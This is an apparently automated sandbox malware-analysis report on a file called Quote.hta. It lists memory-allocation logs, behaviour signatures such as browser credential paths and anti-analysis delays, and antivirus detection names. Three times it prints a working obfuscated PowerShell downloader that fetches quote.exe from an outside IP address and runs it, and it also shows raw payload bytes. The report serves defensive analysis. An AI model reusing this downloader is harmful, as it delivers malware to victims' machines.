NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02703000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02704000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02705000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02706000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02707000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02708000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02709000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ada000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04adb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04adc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04add000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ade000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04adf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fa1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fa3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fa4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

netbtugc.exe tried to sleep 163 seconds, actually delayed analysis time by 163 seconds

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\quote.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\quote.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 5, 2024, 9:13 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ; filepath: powershell.exe	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 1984 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 5, 2024, 9:13 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (1 event)

Data received

ÁèÂ@ÒÁ+ÂuAù')|Ý¸?Å%C÷îÁúòÁîòuíMu¶0¶A0F¶A0F¶A0Fë¤$¸ó§-4÷ïÁúúÁïúuí_^]ÃñU·¿K-Uìì¹kS3Ûÿ¸8pà÷éÑÁúÊÁéÊuë3ÀEø9EãMÁVMðWÿE¿vWEìEÿ¹$¾§»çb¸d4L÷ïÁúúÁïúuí¸¶¾ ÷éÁúÊÁéÊuíUþ¶zø¶¶Á¶ÀÀÂPWEôè!Ä¸D&¹öd$;ñLñHuøEô¸ëQ÷ëÁúÚÁëÚuí¶ÁMð2EÿMìEø@Eø;E,ÿÿÿ_^CÃ%yHÈø@uCû/|æ[å]Ã§Èéhó,!ÏÐìUìM3À8td$@<uù@PÿuQè¾òÿÿÄ]ÃF!ÇdRëåÕØUìM3Àf9tI@f<AuøEPÿuQèòÿÿÄ]ÃÌÌUìjÿuèÃ÷ÿÿÄÀt@]Ã3À]Ã ¸UìMW}ÀtVÑ÷fRfvÀuï^3À8t I|@uö3ÉfG_]Ã(!9ÖýÂ6?áõ:UìUEVuö~Wø+ú NRöó_^]ÃçóY8YæßÃUìMÉt¶EiÀVñW}Áéó«Îáóª_^E]ÃÌÌé«ûÿÿ»Ü¡Å/à¯-UìQVuöu3À^å]Ã~u2~ÆFtèèúÿÿ¯FëèÝúÿÿFÇF@]ÇFb"ÇF *@NÑÁ%ÿÿÁê3ÐF5Aýÿÿ#ÁNÁàSÁê3ÐÙÁÁèã>3ØF$5A}G#ÁNÁàWÁë3ØùÁ%ÿÁï 3øF5A}Gÿ#ÁV^ÁàÁï3ø~UüV òÁîÂ%þÿ3ðEÁî H(ñA}ÿÿ#ÊÁá 3ñp 3÷3ó3uü_Ñî[Æ^å]ÃÌUìSVuWÇØÇÌ¿¸øÇì¹¸øÇä±¸øÇðÁ¸øÆÈVè¹þÿÿÄÈd$¶Á;Er ;Eîöu3Éëç~u2~ÆFtèùÿÿ¯FëèùÿÿFÇF@]ÇFb"ÇF *@NÙÁ%ÿÿÁë3ØF5Aýÿÿ#ÁNÁàùÁë3ØÁÁèç>3øF$5A}G#ÁNÁàÑÁï3øÁ%ÿÁê 3ÐF5A}Gÿ#ÁN ÁàÁê3ÐÁÁèEÁ%þÿ1EF(Ám 5A}ÿÿ#ÁMÁà 3ÈN 3Ê3Ï3Ë^~VÑééÿÿÿ_^Á[]Ã4xW(ãNÙUìMUS[]Ã¨YÐxpã±F;XPÃH£ÑÂbÀVwN¹üÎÃÑuì®PÂ^lå ó÷ÉÍÅe1éÈíØìÙÈëx« Îúx #*,>uÈ'Mèå5Ãá(ã@hE÷ gýmNKóCtÍ3Ãu,±wzPÌEP|FFn0mFYey>ÁË8e*ÈîÖÍD@»>ù bëúXÖó+qîà¢R·ûcyÂíóþùþlÅ_¹^9'ÃL£oÆ|Z.®Ò§>PÅ¥>îft¯0ýèÙm`uSâ@~:¡ÊØ× fï£Tk#õ+{2ÏyQï8Sâ¥È3 áy@<H¯9¥Ád(îÊJM¤Fù[s§Ñäo²ù&,**y'Lê¼H¡;1^§t.,Ñ©ï´Fw¬1Hj;*Lïjsaá%ÃÅÜ'ú;68äiç¿æpí6aý-Þ¿®° »d9ÚgbìråÆ«Ò&çPj±%Xg0÷xMUÅGÝ Q7,6U=µsô§>»¿ä* oUc -*ÀÀ+tó¾Ö4w¸àÌwgH³9i1¶î=t/7üqé`ÿÝæ¨á¶·yÑó¿úÇ=æN»ßg¶]¥¤X¦û0g0¹2?*u²Ì4m¶VcóvRsWE±ÇK(ÅzÜ>8E)$N/xï=t$¿Ü"ÂréÐ*hµ7ó§@o¾,ë,Ï{§ârNåX¡°dõ~ä¬#¶U\ÞëÈ#|§{ú8%°§Ò·£Ê6wþN°~7MÊÒ|M.È7«Vöz ôTÃÂSSøÃ-KfÏÄlQ3gk&·c©i;ê 5G=ßòO1L+ÃÌOH!¨º;»j½0²$d ©¼û(©ª0ÈØ/¶:ÐÅÐ+8ÓAægÑTÅÄª~Q3Ò_ÁKlt.¨'¨^ÞoTs#zóÆGù'õD!ólr<ÿÌüîÓ)WÆZkNl¡ u'È¾¤{Áþ!°QBL k`³M=dÅbMý°¹òÜFKP!ªâÄõAÀëk¦|Kc°çÄcDtUiÅ(ÉUH (@ ¤m1NYÍ!ÿîâí?É>Ý½>¾Ò§L¢h¸úÑs\ÊöÊC¿`Rß0FÞ·äß6}5ÑØÈ/(H_Ð{<ÍteòÞËSaDG'ÝÂ¯ÛKë/g aUxB-ÎþõKÀÃðHßÝÙxòkõè;ëoÅC¥RRi¾¢("¢àÖÿ T«^Är²ë/rçêÀè:¾Ë ç )GH2Ôa¥.ò&+óâÛ-¥ÙÜ©o®©å9iÿ(!+ k¡o©9[NY)?ú»ØZº£6¸¦a/9aâÁ0RýUºFöþùÛ'F2¿SÓ1#òàîT¯kÀ5q¬©ÖÿTÛs}N÷ÛúU b ÜàsëJn¯ÐÊ;Êtêóá§àav¤¤ØÃåV}ò4gñ¥×´TòxêY`ZFæÄ0æmkAfä¦;ÿ/$tÇL3¡/Â'} ` :Ã²T<>X,ð/½t~9ìóµ`;ÈÙ#3®ÌÙ1îÇß*w(Î0}N81nbÈ,ÀiÓ6·séîã7<&a÷éö ^/@¡>×KÔjJ{BÔôïÛ½V~ÆzÀ¦wE°ÙÃÚá~nÓÚ5Vh°=Bsg/Y¼þ:j^BZ[Û³[KÓry.; G£ãL7:[T²¾´§?'o2E¥ãD¸|eÎiG»:»N¸´ËqçeãT¡2ÄwÆéÎº~ktI'¡,WXåh/ÏÁøÎS®Z6ó4=IBð o5,<¸|´7^ü'ºL. Çp»Öâ%¦»ãVÚ+|`çéò´ÞÈ3änÒOH\+ÙBößá'èR>HS6¬@Qw}µVDBÕÞüÁK×¦Bl8OÕp"L.A3¾û½æ;¢õ1xqñI"ÃY|ìMªüµéöNªqÆõV+C·E¦} zÑïîyouNö¯rGÇ«¤¯ãìûJgg1Ò6·á«|OgtCBæxqíÅTì,`×!T|ðç2=çÊÄ;{9_xÄE¶}n Í>Îbúâåæ6¿àX<â6Jq[xL{Â±Áécá«$>ô¿ÔKw/X¹ò{£lDîT}§ÐÈþ\ÓmI/ÜÁa¡[ûáp$ñFïÆäÝTvÁé¹%7äDÃ}=8AXAu;?.\slà?Ð*èGÅxü©|TL¥ÝiRÀÒ_×Z,á5F÷åÿð[ÙVWQSw 8]^³¨÷Yq¨õ×®ë# |CÑXaïüuÒPÐé7àÅÌ_çq-YäÎ8 à+Ã~®ëí\Í`Y¯ì+Å+Kã

Poweshell is sending data to a remote host (1 event)

Data sent

GET /warm/quote.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 5, 2024, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

198.23.201.89

Attempts to identify installed AV products by installation directory (2 events)

file	C:\Users\test22\AppData\Local\AVAST Software\Browser\User Data
file	C:\Users\test22\AppData\Local\AVG\Browser\User Data

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\quote.exe

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send June 5, 2024, 9:13 a.m.	buffer: GET /warm/quote.exe HTTP/1.1 Host: 198.23.201.89 Connection: Keep-Alive socket: 1440 sent: 77	1	77	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Local\Temp\quote.exe"
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Local\Temp\quote.exe

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

Lionic	Trojan.Script.Valyria.a!c
Cynet	Malicious (score: 99)
Skyhigh	HTA/Downloader.f
ALYac	VB:Trojan.Valyria.7482
VIPRE	VB:Trojan.Valyria.7482
VirIT	Trojan.HTA.Dwnldr.DZP
Symantec	Trojan.Gen.NPE
ESET-NOD32	VBS/Agent.QVR
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.7482
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
FireEye	VB:Trojan.Valyria.7482
Ikarus	Trojan.VBS.Agent
Google	Detected
Avira	VBS/Dldr.Agent.VPLT
Kingsoft	Win32.Infected.AutoInfector.a
Arcabit	VB:Trojan.Valyria.D1D3A
GData	VB:Trojan.Valyria.7482
Varist	VBS/Agent.AZC!Eldorado
Tencent	Script.Trojan-Downloader.Generic.Zchl
MAX	malware (ai score=80)
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

The process powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Users\test22\AppData\Local\Temp\quote.exe

Quote.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All